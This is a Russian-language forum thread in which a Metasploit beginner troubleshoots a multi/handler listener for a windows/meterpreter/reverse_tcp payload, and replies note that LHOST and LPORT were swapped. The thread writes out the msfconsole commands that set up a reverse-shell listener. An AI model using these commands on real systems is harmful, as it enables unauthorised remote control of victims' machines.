• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Проблема с Metasploit'ом

W

WHello

Здравствуйте, форумчане. Я новичок в metasploit'e, и возникновение в моем случае каких-либо ошибок неизбежно. Однако проявление следующей ошибки я не нашел ни у кого, и следовательно не могу ее решить.
Код:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 4444
msf exploit(multi/handler) > set LPORT 192.168.0.101
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.0.101

Меня лично уже настораживает вторая строка. Ни в одном туториале я не видел, чтобы в круглых скобках было "multi/handler", а не "handler". Однако, проблема в том, что reverse TCP handler вроде бы запустился, а payload handler не стартует, а значит ни о каком сеансе meterpreter не может быть и речи. Использую Windows 10, в Kali 2.0 такая же проблема. Версия metasploit 4.16.37. В чем проблема, как ее решить?
 

Urfin--Juice

Gold Team
14.11.2017
203
74
BIT
0
Здравствуйте, форумчане. Я новичок в metasploit'e, и возникновение в моем случае каких-либо ошибок неизбежно. Однако проявление следующей ошибки я не нашел ни у кого, и следовательно не могу ее решить.
Код:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 4444
msf exploit(multi/handler) > set LPORT 192.168.0.101
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.0.101

Меня лично уже настораживает вторая строка. Ни в одном туториале я не видел, чтобы в круглых скобках было "multi/handler", а не "handler". Однако, проблема в том, что reverse TCP handler вроде бы запустился, а payload handler не стартует, а значит ни о каком сеансе meterpreter не может быть и речи. Использую Windows 10, в Kali 2.0 такая же проблема. Версия metasploit 4.16.37. В чем проблема, как ее решить?
А вы пробовали сам эксплоит запускать с отстуком на этот handler?
 

woolf1514

Green Team
06.03.2017
181
191
BIT
1
Здравствуйте, форумчане. Я новичок в metasploit'e, и возникновение в моем случае каких-либо ошибок неизбежно. Однако проявление следующей ошибки я не нашел ни у кого, и следовательно не могу ее решить.
Код:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 4444
msf exploit(multi/handler) > set LPORT 192.168.0.101
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.0.101

Меня лично уже настораживает вторая строка. Ни в одном туториале я не видел, чтобы в круглых скобках было "multi/handler", а не "handler". Однако, проблема в том, что reverse TCP handler вроде бы запустился, а payload handler не стартует, а значит ни о каком сеансе meterpreter не может быть и речи. Использую Windows 10, в Kali 2.0 такая же проблема. Версия metasploit 4.16.37. В чем проблема, как ее решить?

А почему значения LPORT и LHOST перепутаны местами?
 

Dr.Lafa

Green Team
30.12.2016
507
1 049
BIT
0
ты вместо LHOST указал порт, а вместо LPORT хост соответственно.
ЗНи в одном туториале я не видел, чтобы в круглых скобках было "multi/handler", а не "handler". Однако, проблема в том, что reverse TCP handler вроде бы запустился, а payload handler не стартует, а значит ни о каком сеансе meterpreter не может быть и речи.
Всё так и должно быть
1518012890970.png
 
Последнее редактирование:
  • Нравится
Реакции: WHello и Vander
W

WHello

ты вместо LHOST указал порт, а вместо LPORT хост соответственно.
Всё так и должно быть
Посмотреть вложение 15531
Да, извиняюсь, я перепутал порт и ip, пока переписывал код из консоли. А так я обычно с этим проблем не возникает, тем более что консоль укажет на ошибку. Т.е. насколько я понял, все действительно так должно быть и это нормальное поведение metasploit'a?
 
  • Нравится
Реакции: woolf1514
M

Merchan14

Здравствуйте! Помогите новичку. Во время установки столкнулся с такой проблемой. Из-за чего это происходит и как это решить?

Screenshot_2018-04-16-14-44-45[1].png
 
I

ilyxa769

Зависает на этом моменте, что делать?
 

Вложения

  • IMG_20180819_164159.jpg
    IMG_20180819_164159.jpg
    2,8 МБ · Просмотры: 944
I

ilyxa769

а что нужно сделать ?

она долго так стоит, хотя файл запущен на моем пк

не понял вас
 
K

kravlsf

Здравствуйте, форумчане. Я новичок в metasploit'e, и возникновение в моем случае каких-либо ошибок неизбежно. Однако проявление следующей ошибки я не нашел ни у кого, и следовательно не могу ее решить.
Код:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 4444
msf exploit(multi/handler) > set LPORT 192.168.0.101
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.0.101

Меня лично уже настораживает вторая строка. Ни в одном туториале я не видел, чтобы в круглых скобках было "multi/handler", а не "handler". Однако, проблема в том, что reverse TCP handler вроде бы запустился, а payload handler не стартует, а значит ни о каком сеансе meterpreter не может быть и речи. Использую Windows 10, в Kali 2.0 такая же проблема. Версия metasploit 4.16.37. В чем проблема, как ее решить?
Новички меня покоряют своими логическими соображениями. Сначала ты прописываешь use exploit/multi/handler а потом удивляешься почему у тебя в скобках multi/handler.
Ты хост и порт местами перепутал.
 
  • Нравится
Реакции: CHEATER и Bypass
T

TheZorg

Соединение установлено, но строка для ввода команд не появляется. В чём может быть проблема?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!